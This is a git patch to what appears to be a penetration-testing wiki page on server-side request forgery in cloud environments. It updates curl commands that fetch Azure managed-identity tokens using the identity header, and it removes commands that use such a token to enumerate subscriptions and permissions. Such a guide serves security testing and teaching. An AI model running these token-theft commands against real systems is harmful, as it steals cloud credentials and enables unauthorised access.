From 10ff48619048ae0ad9f6019d05e206631d9e555c Mon Sep 17 00:00:00 2001
From: SirBroccoli
Date: Sat, 21 Dec 2024 16:58:05 +0000
Subject: [PATCH] GITBOOK-4453: No subject

---
 .../cloud-ssrf.md | 20 +++----------------
 1 file changed, 3 insertions(+), 17 deletions(-)

diff --git a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
index 7d272d781..dd19a3f76 100644
--- a/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
+++ b/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
@@ -482,26 +482,13 @@ Most of the time, you want a token for one of these resources:
 echo $IDENTITY_HEADER
 echo $IDENTITY_ENDPOINT
-# You should also be able to find the folder:
+# (Fingerprint) You should also be able to find the folder:
 ls /opt/microsoft
-#and the file
-ls /opt/microsoft/msodbcsql17
 # Get management token
-curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
+curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/&api-version=2019-08-01" -H X-IDENTITY-HEADER:$IDENTITY_HEADER
 # Get graph token
-curl "$IDENTITY_ENDPOINT?resource=https://graph.azure.com/&api-version=2017-09-01" -H secret:$IDENTITY_HEADER
-
-# API
-# Get Subscriptions
-URL="https://management.azure.com/subscriptions?api-version=2020-01-01"
-curl -H "Authorization: $TOKEN" "$URL"
-# Get current permission on resources in the subscription
-URL="https://management.azure.com/subscriptions//resources?api-version=2020-10-01'"
-curl -H "Authorization: $TOKEN" "$URL"
-# Get permissions in a VM
-URL="https://management.azure.com/subscriptions//resourceGroups/Engineering/providers/Microsoft.Compute/virtualMachines//providers/Microsoft.Authorization/permissions?api-version=2015-07-01"
-curl -H "Authorization: $TOKEN" "$URL"
+curl "$IDENTITY_ENDPOINT?resource=https://graph.azure.com/&api-version=2019-08-01" -H X-IDENTITY-HEADER:$IDENTITY_HEADER
 ```
 ```powershell
@@ -650,4 +637,3 @@ Learn & practice GCP Hacking:
 {% endhint %}
-